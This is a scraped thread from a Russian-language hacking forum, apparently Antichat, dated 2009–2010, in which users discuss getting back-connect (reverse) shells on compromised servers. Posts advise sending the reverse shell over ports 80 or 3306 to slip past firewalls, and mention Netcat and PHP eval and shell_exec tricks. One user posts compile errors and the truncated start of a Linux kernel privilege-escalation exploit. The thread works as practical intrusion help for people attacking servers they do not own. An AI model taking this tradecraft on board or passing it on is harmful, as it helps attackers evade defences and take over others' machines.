30.10.2009, 22:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами:
9521666
Репутация:
1695
|
|
Но что делать, если и тут всё обламывает файервол?
Как-то столкнулся с тем что не мог сделать бекконнект ... видимо фаервол разрешал исходящие соединения только для ESTABLISHED (ибо веб работал), a также на обычные порты 80, 3306.
Поэтому могу посоветовать, если не получается подключиться бекконектом на какой-нить 9999 порт, попробовать использовать порт 80, 3306 или другой системный.
В моем случае сработало!
|
|
|
30.10.2009, 22:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Ужас какое наркоманство, непомню что на меня так повлияло, видмо зеленый чай, который чего то черным был))
Вот такое извращение, хотя оказывается пашет:
PHP код:
echo shell_exec(eval('system("ls");'));
В серьёз не воспринимать ))))
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 30.10.2009 в 22:45..
|
|
|
|
20.03.2010, 05:41
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
Любая антивирь утила под юнь спалит эту хрень в два счёта... проверено.Надо уже изобретать что-то новое.
|
|
|
|
03.10.2010, 16:23
|
|
Постоянный
Регистрация: 07.06.2006
Сообщений: 556
С нами:
10487846
Репутация:
2702
|
|
Netcat.exe
|
|
|
|
03.10.2010, 17:51
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
В чем фейл?
Сообщение от None
sh-2.05b$ gcc expl.c
expl.c: In function `docall':
expl.c:52: warning: cast from pointer to integer of different size
expl.c:54: warning: cast to pointer from integer of different size
expl.c:60: warning: comparison between pointer and integer
expl.c: In function `main':
expl.c:77: warning: integer constant is too large for "long" type
expl.c:78: warning: integer constant is too large for "long" type
expl.c:79: warning: integer constant is too large for "long" type
expl.c:82: warning: cast to pointer from integer of different size
expl.c:115: error: `ORIG_RAX' undeclared (first use in this function)
expl.c:115: error: (Each undeclared identifier is reported only once
expl.c:115: error: for each function it appears in.)
Сообщение от None
Linux n15 2.6.33.1mtv2 #1 SMP Tue Jul 20 21:31:39 PDT 2010 i686
|
|
|
|
03.10.2010, 22:08
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
Сообщение от Scipio
>>Вообщето сплойты можна юзать из веба
видел твой пост, но по моему это не твоя идея, я без наезда, просто подзабыл.
echo eval($row['comment']);
Жжешь)))а юзать бекконнект - твоя идея?)))))))))))))Или я не в теме?
|
|
|
|
03.10.2010, 22:10
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
Сообщение от DCrypt
В чем фейл?
Эм,а разве не gcc file.c -o outputfile ? А в сплоенте и могут возникнуть ошибки изза пробелов/переводов строк или неюзабельности комментария #.Вгетом и линксом пробовал все гут.
|
|
|
|
03.10.2010, 22:14
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
Сообщение от Nightmarе
Заодно тут спрошу, мб кто знает...
Если для бекконнекта использовать промежуточный сервер через NetCat, то консоль линуксовую начинает дико передергивать, при выполнении одной команды выводится ответ на предыдущюю команду, и прочие глюки, которые мм... сложно описать.
Кто как выходит из ситуации? Может есть консольный аналог под нетката под винду?
Да, дедики просьба не предлогать.
Бывало такое,но соединялся напрямую с хостом без юзанья промежуточных серверов.Иногда консоль вообще подвисала жестко,хотя и сервер работал отлично(вбиваешь утилу в консоль,ждёшь вчас и вырубаешь на нервах).Именно под вынь сервер такое было.Через день само пропало...Мб это никак и не связано,но из проблемы я не вышел...
|
|
|
|
12.10.2010, 01:12
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
Сообщение от Welemir
Эм,а разве не gcc file.c -o outputfile ? А в сплоенте и могут возникнуть ошибки изза пробелов/переводов строк или неюзабельности комментария #.Вгетом и линксом пробовал все гут.
Код:
sh-2.05b$ gcc linux-syscall.c -o lin
linux-syscall.c: In function `docall':
linux-syscall.c:41: warning: cast from pointer to integer of different size
linux-syscall.c:43: warning: cast to pointer from integer of different size
linux-syscall.c:49: warning: comparison between pointer and integer
linux-syscall.c: In function `main':
linux-syscall.c:66: warning: integer constant is too large for "long" type
linux-syscall.c:67: warning: integer constant is too large for "long" type
linux-syscall.c:68: warning: integer constant is too large for "long" type
linux-syscall.c:71: warning: cast to pointer from integer of different size
linux-syscall.c:104: error: `ORIG_RAX' undeclared (first use in this function)
linux-syscall.c:104: error: (Each undeclared identifier is reported only once
linux-syscall.c:104: error: for each function it appears in.)
sh-2.05b$
Вот код сплойта.
[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
uint32_t uid, euid, suid;
static void kernelmodecode(void)
{
int i;
uint8_t *gs;
uint32_t *ptr;
asm volatile ("movq %%gs  0x0), %0" : "=r"(gs));
for (i = 200; i
|
|
|
|
31.10.2010, 02:32
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Статья очень даже ничего, я в этом деле новичок - мне виднее =) Все расписано по-человечески и хорошо понятно, что к чему. Вот только ава, мягко сказано, смущает... =(
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.jpg?2370916){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
Похожие темы
Комбинированный вид
